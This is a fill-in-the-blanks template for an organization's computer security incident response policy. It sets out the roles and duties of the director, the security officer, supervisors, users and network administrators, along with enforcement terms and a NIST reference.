Overview and purpose

As the threats to information systems multiply, the number of computer security incidents rises and cost of business disruption and service restoration escalates. While information security practices and policies attempt to protect information systems from improper access, the complexity of networks and the increasing sophistication of cybercriminals perpetuates the possibility that [variable: Covered Organization] computer systems will be compromised.

A well-organized response to the discovery of systems breaches or exposure can mean the difference between a relatively minor market reaction and a prolonged, devastating episode of financial and customer hardships. Incident response seeks to limit the damage of incidents and protect [variable: Covered Organization] information, as well as the information of others potentially affected by the incident.And, finally, a solid incident response also lays technical groundwork for investigation and legal recourse against the parties responsible for the incident.

This document describes the requirements for responding to computer security incidents. Security incidents include, but are not limited to:

• Virus, worm, and Trojan horse detection
• Discovery of unauthorized use of computer accounts and computer systems
• Complaints of improper use of Information Resources, as outlined in the Acceptably Use Policies for Systems, Email, and Internet.

Coverage

All individuals that use any [variable: Covered Organization] Information Resources.

Definitions

General Terminology

• Information Resources
• Incident
• Virus
• Worm
• Trojan horse
• Incident
• Vendor

Roles and Functions

• Information Resources Manager (IRM)
• Information Security Officer (ISO)
• Computer Incident Response Team (CIRT)
• Computer Incident Response Team (CIRT) Director

Policy

• The organization assigns individuals to a [variable: Name of response team; e.g., CIRT, CSIRC, CERT]
• If an incident is suspected or confirmed, appropriate Incident Management procedures must be followed.
• CIRT members have defined roles and responsibilities that can take priority over normal duties, as required

Director

• Immediately informs [variable: covered Organization] management of significant incidents (major compromise of data, denial of service)

Information Security Officer (ISO) or Information Systems Security Officer (ISSO):

• Notifies the Director of significant incidents and response plan
• Determines whether identified incidents are computer-security related
• Works with law enforcement, system users, system administrators, and the network manager/administrator as necessary to formulate an initial incident response plan
• Works with system users, system administrators, and the network manager/administrator to review and, if necessary, modify the incident response plan
• Provides updates to management on incident response plan and progress
• Determines if incident follow-up is indicated
• Submits reports regarding incident response and follow-up

System Supervisor:

• Educates employees on incident response requirements
• Contacts the ISO/ISSO within [variable: Time frame] after an incident is discovered
• Works with law enforcement, system users and/or administrators, the network manager/administrator, and the ISSO to formulate an initial response plan
• Updates management on status of incident response
• Ensures required incident and incident response reports are prepared and submitted to ISO/ISSO within required timelines

System User/ System Administrator: If the system user or administrator is informed or suspects an incident has occurred, s/he should perform the following tasks:

• Investigate and validate incident occurrence
  • If suspicion is ungrounded, log and share knowledge with ISO/ISSO and networking manager/administrator
  • If suspicion is confirmed or indeterminate, confer with supervisor, ISO/ISSO, and networking manager/administrator
• Start an event log by noting date and time of all actions
• Take snapshot of pertinent files within the first half hour of incident investigation
• Identify scope of risk to systems or information
• Confer with ISO/ISSO and networking manager/administrator
• Begin to implement response plan within forty-five minutes of incident discovery
• Notify management of significant incident and response plan
• Continually monitor the situation
• Assist supervisor in preparing preliminary and final report

Networking Manager/Administrator:

• Works with the users and/or system administrators, and the ISO/ISSO, to formulate an initial response plan
• Assists as required to evaluate and mitigate incident
• Reviews response plan and, if necessary, assists in modifying the plan

Enforcement

Violation of this policy may result in disciplinary action which may include termination for employees and temporaries; a termination of employment relations in the case of contractors or consultants; dismissal for interns and volunteers; or suspension or expulsion in the case of a student. Additionally, personnel are subject to loss of [variable: Covered Organization] Information Resources access privileges, civil, and criminal prosecution.

Supporting Documentation

This policy is supported by the following rules, standards, and procedures:

• [variable: internal documents (with links, if available)]
• [variable: external documents (with links, if available)]

Policy Support Contact

• [variable: title (not personal name) of role responsible for overseeing this procedure]
• [variable: Contact information of office responsible for overseeing this procedure]

References

Policy Model(s)

• Federal Agency Security Practices, US Government, National Institute of Standards and Technology (NIST)